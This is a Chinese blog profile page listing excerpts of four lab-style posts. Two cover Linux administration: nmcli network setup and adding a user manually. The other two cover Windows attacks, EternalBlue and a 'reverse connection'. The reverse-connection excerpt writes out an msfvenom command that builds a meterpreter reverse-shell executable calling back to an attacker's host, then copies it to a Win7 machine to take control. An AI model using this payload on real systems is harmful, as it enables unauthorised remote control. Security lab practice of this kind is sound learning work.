自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 rocky linux8 网络配置

1.nmcli connection modify ens160 ipv4.method auto>>接口配置为DHCP。set ipv4.addresses (静态IP地址)/24>>设置静态IP地址,/24是子网前缀长度表示方法。4.nmcli connection up ens160>>重新激活连接。3.nmcli connection up ens160>>激活配置。2.nmcli connection up ens160>> 激活。3.>>切换DHCP并清除静态IP配置。

2025-12-30 22:42:34 129

原创 linux手动添加用户

ls查看gshadow的写权限(跟shadow一样要有写权限,如没有同上文一样操作)vi修改/etc/gshadow文件内容,添加用户组密码信息【编辑内容看图三】vi编辑/etc/shadow文件内容,添加用户密码信息【编辑内容看图三】vi修改/etc/group文件内容,添加用户组信息【编辑内容看图二】1.修改/etc/passwd文件内容,添加用户(jiabei)信息。ls -a查看/etc/skel目录文件(ls查看是隐藏的)vi编辑/etc/passwd【编辑内容看图二】ls -la再次查看。

2025-12-30 12:03:35 74

原创 反向连接(最简单)

输入 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f exe -o 文件名.exe。反向连接:受害机器(客户端)主动向外连接攻击者控制的服务器(服务端)。第二条是在攻破 64 位 Windows 系统后,建立一个稳定、隐蔽、功能丰富的远程控制通道。反向连接成功,获得win7控制权。第一条是用于接收和管理由反向shell荷载发起的反向连接。4.将生成的rr.exe经本机复制到win7。2.在root权限下。

2025-11-01 11:56:18 135

原创 永恒之蓝漏洞

win7:win键+R打开运行输入cmd,进入管理员,输入ipconfig,得到ip。忽略前面,从msf6> 后输入。

2025-11-01 10:28:39 290

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除